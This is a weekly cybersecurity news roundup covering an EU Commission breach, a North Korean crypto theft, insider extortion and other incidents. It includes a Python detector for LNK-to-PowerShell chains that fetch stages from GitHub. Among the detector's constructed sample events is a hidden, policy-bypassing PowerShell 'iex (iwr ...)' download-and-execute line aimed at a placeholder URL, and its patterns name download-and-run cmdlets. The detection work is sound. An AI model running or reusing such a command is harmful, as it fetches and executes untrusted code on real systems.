Weekly Threat Roundup: EU Breach, Insider Extortion, and North Korean Crypto Heist

Severity: high | Malware & Threats | April 3, 2026 | 4 min read

Originally reported by BleepingComputer, Graham Cluley, Cisco Talos, Malwarebytes Labs, Fortinet

#threat-roundup #data-breach #insider-threat #cryptocurrency #north-korea #malware #enterprise-security #supply-chain

TL;DR

Major security incidents this week include a TeamPCP breach of EU Commission systems exposing data from 30 entities, North Korean hackers stealing $280 million from Drift Protocol, and discovery of pre-authentication RCE vulnerabilities in Progress ShareFile.

Why high?

Multiple high-impact incidents including a major EU data breach affecting 30 entities, a $280M cryptocurrency theft attributed to North Korean actors, and critical vulnerabilities in enterprise file-sharing platforms.

EU Commission Breach Exposes 30 Entities

CERT-EU has attributed the European Commission cloud infrastructure breach to the TeamPCP threat group and revealed that the incident exposed sensitive data belonging to at least 29 other EU entities beyond the Commission itself. The breach demonstrates the cascading impact of a cloud infrastructure compromise in interconnected government environments and highlights the risk concentrated in shared cloud architectures used by governmental organizations.

North Korean Hackers Drain $280M from Drift Protocol

The Drift Protocol suffered a devastating $280 million loss after threat actors, likely linked to North Korean state operations, seized control of the platform's Security Council administrative powers. The sophisticated attack represents one of the largest cryptocurrency thefts of the year and underscores the continuing threat posed by DPRK-linked groups to decentralized finance platforms.

Insider Extortion Plot Locks 254 Servers

A former core infrastructure engineer pleaded guilty to an extortion scheme that locked Windows administrators out of 254 servers at his New Jersey-based industrial employer. The case highlights the persistent threat posed by malicious insiders with privileged access, and the importance of robust access controls and monitoring for departing employees who hold administrative privileges.

Progress ShareFile Vulnerabilities Enable Pre-Auth RCE

Researchers discovered two vulnerabilities in Progress ShareFile that can be chained together to enable unauthenticated file exfiltration from affected enterprise environments. The pre-authentication remote code execution attack path poses significant risks to organizations using the popular secure file transfer solution, particularly given ShareFile's widespread adoption in enterprise environments.

Apple Expands DarkSword Exploit Kit Patches

Apple has quietly extended patches against vulnerabilities exploited by the DarkSword exploit kit to include iOS and iPadOS 18.7.7. The expanded patch coverage suggests the vulnerabilities targeted by DarkSword represent a broader threat surface than initially disclosed, emphasizing the importance of prompt iOS updates.

Stryker Recovers from Data-Wiping Attack

Medical technology giant Stryker Corporation has returned to full operational status three weeks after the Iranian-linked Handala hacktivist group claimed responsibility for a data-wiping cyberattack that severely disrupted the company's systems. The incident demonstrates both the destructive capabilities of state-affiliated threat groups and the resilience planning required for critical healthcare infrastructure.

DPRK Groups Leverage GitHub for C2 Operations

Fortinet researchers detailed a North Korean campaign using LNK files and GitHub repositories as covert command-and-control infrastructure. The technique demonstrates the continued evolution of DPRK cyber operations, utilizing legitimate platforms to evade detection while maintaining persistent access to compromised Windows environments through multi-stage PowerShell execution chains.
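The chain described above (a shortcut file launching PowerShell, which in turn fetches follow-on stages from GitHub) leaves a recognisable footprint in process-creation telemetry. The following is an added example written for this roundup, not code from Fortinet's report or from this site: a small scorer over Sysmon-style process-creation records (parent image, image, command line) that flags PowerShell instances spawned by explorer.exe with hidden-window, policy-bypass, download-and-execute or GitHub-host indicators on the command line. The event records, field names and the repository path in the suspicious sample are all constructed for illustration; the repository path is a placeholder, not an indicator from the campaign.

```python
import re
from dataclasses import dataclass


# Process-creation records in the shape of Sysmon Event ID 1 fields
# (ParentImage, Image, CommandLine). All events below are CONSTRUCTED samples.
@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Hosts a GitHub-hosted staging or C2 channel would typically contact.
GITHUB_HOSTS = (
    "github.com",
    "raw.githubusercontent.com",
    "api.github.com",
    "objects.githubusercontent.com",
)

# (description, compiled regex over the command line). Each match adds one point.
CMDLINE_INDICATORS = [
    ("encoded command", re.compile(r"(?<![\w-])-(?:e|ec|enc|encodedcommand)\b", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("profile suppressed", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("execution policy bypass", re.compile(r"-(?:ep|executionpolicy)\s+bypass\b", re.I)),
    ("download-and-run cmdlet",
     re.compile(r"\b(?:iex|iwr|Invoke-Expression|Invoke-WebRequest|DownloadString)\b", re.I)),
]


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one process-creation event.

    Only PowerShell images are scored; everything else returns (0, []).
    """
    if _basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return 0, []
    reasons = []
    if _basename(ev.parent_image) == "explorer.exe":
        # explorer.exe is the parent when a user double-clicks a shortcut file.
        reasons.append("PowerShell spawned by explorer.exe (what an LNK double-click produces)")
    lowered = ev.command_line.lower()
    if any(host in lowered for host in GITHUB_HOSTS):
        reasons.append("command line references a GitHub host")
    for desc, pattern in CMDLINE_INDICATORS:
        if pattern.search(ev.command_line):
            reasons.append(desc)
    return len(reasons), reasons


def find_suspicious(events, threshold=3):
    """Return [(event, score, reasons)] for events scoring at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


# Constructed sample telemetry: two benign PowerShell launches, one LNK-style chain,
# and one unrelated process.
SAMPLE_EVENTS = [
    # Benign: an admin runs a backup script from cmd.exe.
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Scripts\nightly-backup.ps1"),
    # Benign: a developer clones a repository from the VS Code terminal (GitHub host only).
    ProcessEvent(r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
                 r"C:\Program Files\PowerShell\7\pwsh.exe",
                 "pwsh.exe -Command git clone https://github.com/example-org/example-repo"),
    # Suspicious (constructed): explorer.exe -> hidden PowerShell pulling a stage from GitHub.
    # The repository path is a PLACEHOLDER, not a real indicator.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -nop -w hidden -ep bypass -c "iex (iwr '
                 'https://raw.githubusercontent.com/PLACEHOLDER-ORG/PLACEHOLDER-REPO/main/stage2.txt)"'),
    # Unrelated process: never scored.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Notepad++\notepad++.exe",
                 "notepad++.exe notes.txt"),
]


if __name__ == "__main__":
    for ev, score, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"score={score} parent={_basename(ev.parent_image)} cmd={ev.command_line}")
        for r in reasons:
            print(f"  - {r}")
```

The threshold keeps the developer's `git clone` (one point, for the GitHub host alone) out of the alert set while the explorer-spawned, hidden, policy-bypassing download chain scores six. In a real deployment the same fields come from Sysmon Event ID 1 or an EDR's process-start stream, and the GitHub-host indicator is best treated as corroboration rather than an alert on its own, since legitimate developer traffic to GitHub is constant.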

Claude Code Leak Exploited for Malware Distribution

Threat actors are capitalizing on the recent Claude Code source code leak by creating fake GitHub repositories that deliver Vidar information-stealing malware. The campaign highlights how high-profile security incidents create opportunities for follow-on attacks targeting users seeking leaked or compromised code.

Romance Scammer Caught by Fellow Fraudster

A Nigerian romance scammer received a 15-year prison sentence after accidentally targeting another fraudster, who provided investigators with incriminating chat logs. The case offers rare insight into the operational security failures that can bring down otherwise sophisticated social engineering operations.

Exchange Online Access Issues Persist

Microsoft continues investigating intermittent Exchange Online mailbox access problems affecting Outlook mobile and macOS users over several weeks. The ongoing availability issues highlight the operational risks associated with cloud email dependencies and the challenges of maintaining service reliability at scale.

Additional Security Developments

Residential Proxy Evasion: Research indicates residential proxies successfully evaded IP reputation systems in 78% of over 4 billion analyzed sessions, demonstrating significant blind spots in current threat detection methodologies.

Physical-Digital Crime Convergence: Threat actors are exploiting vacant properties as mail intercept points, combining traditional fraud techniques with digital identity theft in hybrid criminal operations.

Microsoft Force Upgrades: Microsoft has begun automatically upgrading unmanaged Windows 11 24H2 devices to version 25H2, potentially creating compatibility issues for organizations with delayed patch management cycles.

Sources

  • https://www.bleepingcomputer.com/news/security/cert-eu-european-commission-hack-exposes-data-of-30-eu-entities/
  • https://www.bleepingcomputer.com/news/security/drift-loses-280-million-north-korean-hackers-seize-security-council-powers/
  • https://www.bleepingcomputer.com/news/security/man-admits-to-extortion-plot-locking-coworkers-out-of-thousands-of-windows-devices/
  • https://www.bleepingcomputer.com/news/security/new-progress-sharefile-flaws-can-be-chained-in-pre-auth-rce-attacks/
  • https://www.malwarebytes.com/blog/news/2026/04/apple-expands-darksword-patches-to-ios-18-7-7
  • https://www.bleepingcomputer.com/news/security/medtech-giant-stryker-fully-operational-after-data-wiping-attack/
  • https://feeds.fortinet.com/~/953053052/0/fortinet/blog/threat-research~DPRKRelated-Campaigns-with-LNK-and-GitHub-C
  • https://www.bleepingcomputer.com/news/security/claude-code-leak-used-to-push-infostealer-malware-on-github/
  • https://www.bitdefender.com/en-us/blog/hotforsecurity/nigerian-romance-scammer-jailed
  • https://www.bleepingcomputer.com/news/microsoft/microsoft-still-working-to-fix-exchange-online-mailbox-access-issues/
  • https://www.bleepingcomputer.com/news/security/residential-proxies-evaded-ip-reputation-checks-in-78-percent-of-4b-sessions/
  • https://www.bleepingcomputer.com/news/security/adversaries-exploit-vacant-homes-to-intercept-mail-in-hybrid-cybercrime/
  • https://www.bleepingcomputer.com/news/microsoft/microsoft-now-force-upgrades-unmanaged-windows-11-24h2-pcs/
